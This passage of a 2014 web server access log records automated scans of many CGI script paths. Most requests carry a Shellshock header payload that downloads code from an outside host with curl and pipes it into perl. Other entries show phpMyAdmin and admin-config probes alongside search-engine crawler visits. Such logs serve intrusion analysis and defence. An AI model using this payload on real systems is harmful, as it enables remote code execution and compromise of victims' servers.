[31/Oct/2014:23:34:11 +0200] "GET /cgi-bin/FileSeek2.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:12 +0200] "GET /cgi-bin/FileSeek.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:12 +0200] "GET /cgi-bin/faqmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:13 +0200] "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:14 +0200] "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:15 +0200] "GET /cgi-bin/ezshopper/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:15 +0200] "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:16 +0200] "GET /cgi-bin/ezman.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:17 +0200] "GET /cgi-bin/ezboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:17 +0200] "GET /cgi-bin/ezadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:18 +0200] "GET /cgi-bin/environ.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:19 +0200] "GET /cgi-bin/enter.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:19 +0200] "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:20 +0200] "GET /cgi-bin/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:22 +0200] "GET /cgi-bin/download.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:22 +0200] "GET /cgi-bin/directorypro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:23 +0200] "GET /cgi-bin/dig.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:24 +0200] "GET /cgi-bin/diagnose.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:25 +0200] "GET /cgi-bin/dfire.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:25 +0200] "GET /cgi-bin/dcforum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:26 +0200] "GET /cgi-bin/dbman/db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:27 +0200] "GET /cgi-bin/db_manager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:27 +0200] "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:28 +0200] "GET /cgi-bin/day5datacopier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:29 +0200] "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:29 +0200] "GET /cgi-bin/cvsquery.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:30 +0200] "GET /cgi-bin/cvslog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:31 +0200] "GET /cgi-bin/cvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:32 +0200] "GET /cgi-bin/csv_db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:32 +0200] "GET /cgi-bin/csSearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:33 +0200] "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:34 +0200] "GET /cgi-bin/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:34 +0200] "GET /cgi-bin/csNewsPro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:35 +0200] "GET /cgi-bin/csNews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:36 +0200] "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:36 +0200] "GET /cgi-bin/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:38 +0200] "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:39 +0200] "GET /cgi-bin/csGuestBook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:40 +0200] "GET /cgi-bin/csChatRBox.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:41 +0200] "GET /cgi-bin/Count.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:44 +0200] "GET /cgi-bin/common/listrec.plHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:34:43 +0200] "GET /cgi-bin/compatible.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:47 +0200] "GET /cgi-bin/commandit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:45 +0200] "GET /cgi-bin/commerce.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:48 +0200] "GET /cgi-bin/classifieds/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:50 +0200] "GET /cgi-bin/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:49 +0200] "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:52 +0200] "GET /cgi-bin/classified.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:53 +0200] "GET /cgi-bin/cgi_processHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:34:54 +0200] "GET /cgi-bin/cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:56 +0200] "GET /cgi-bin/cgforum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:57 +0200] "GET /cgi-bin/ccvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:58 +0200] "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:59 +0200] "GET /cgi-bin/cartmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:01 +0200] "GET /cgi-bin/calendar/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:02 +0200] "GET /cgi-bin/cachemgr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:03 +0200] "GET /cgi-bin/cached_feed.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:06 +0200] "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:07 +0200] "GET /cgi-bin/build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:08 +0200] "GET /cgi-bin/bslist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:11 +0200] "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:13 +0200] "GET /cgi-bin/bnbform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:14 +0200] "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:17 +0200] "GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:19 +0200] "GET /cgi-bin/bb-replog.shHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:35:20 +0200] "GET /cgi-bin/bb-rep.shHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:35:21 +0200] "GET /cgi-bin/bb-hostsvc.shHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:35:29 +0200] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:30 +0200] "GET /cgi-bin/auktion.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:31 +0200] "GET /cgi-bin/auction/auction.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:31 +0200] "GET /cgi-bin/AT-generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:32 +0200] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:33 +0200] "GET /cgi-bin/astrocam.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:35 +0200] "GET /cgi-bin/alienform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:36 +0200] "GET /cgi-bin/aglimpse.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:37 +0200] "GET /cgi-bin/af.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:40 +0200] "GET /cgi-bin/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:41 +0200] "GET /cgi-bin/admin.plHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:35:42 +0200] "GET /cgi-bin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:42 +0200] "GET /cgi-bin/adduser.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:43 +0200] "GET /cgi-bin/addbanner.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:44 +0200] "GET /cgi-bin/add_ftp.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:44 +0200] "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:45 +0200] "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:46 +0200] "GET /cgi-bin/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:46 +0200] "GET /cgi-bin/14all.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:47 +0200] "GET /cgi-bin/14all-1.1.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:48 +0200] "GET /cgi-bin/.namazu.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:35:51 +0200] "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +157.55.39.32 - - [31/Oct/2014:23:39:21 +0200] "GET /ftp/public/pictures/gallery/IMG_9783_rdct_small.jpg] HTTP/1.1" 404 484 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.160 - - [31/Oct/2014:23:44:39 +0200] "GET /robots.txt HTTP/1.1" 404 446 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +203.195.161.32 - - [31/Oct/2014:23:54:20 +0200] "GET /hphp/hph/hp.php HTTP/1.1" 404 416 "-" "-" +203.195.161.32 - - [31/Oct/2014:23:54:21 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +203.195.161.32 - - [31/Oct/2014:23:54:22 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +203.195.161.32 - - [31/Oct/2014:23:54:22 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.72 - - [01/Nov/2014:00:37:59 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +80.82.78.87 - - [01/Nov/2014:01:16:05 +0200] "GET /admin/config.php HTTP/1.1" 404 398 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2" +123.125.71.95 - - [01/Nov/2014:01:32:47 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.141 - - [01/Nov/2014:01:33:54 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +131.253.24.58 - - [01/Nov/2014:02:11:13 +0200] "-" 408 0 "-" "-" +131.253.24.58 - - [01/Nov/2014:02:11:13 +0200] "-" 408 0 "-" "-" +123.125.71.100 - - [01/Nov/2014:02:17:15 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +64.235.231.12 - - [01/Nov/2014:02:23:04 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:23:05 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:23:05 +0200] "GET / HTTP/1.0" 200 490 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:08 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:13 +0200] "GET /gitweb/ HTTP/1.0" 404 445 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:14 +0200] "GET /gitweb/gitweb.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:17 +0200] "GET /cgi-bin/php5 HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:16 +0200] "GET /cgi-bin/php HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:18 +0200] "GET /cgi-bin/php4 HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:26 +0200] "GET /sys-cgi HTTP/1.0" 404 445 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:23 +0200] "GET /cgi-bin/admin.html HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:27 +0200] "GET /cgi-bin/tree.php HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:28 +0200] "GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:28 +0200] "GET /cgi-bin/hello HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:29 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:31 +0200] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 459 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:32 +0200] "GET /wwwboard.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:32 +0200] "GET /wwwadmin.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:33 +0200] "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0" 404 470 "() { :; }; curl 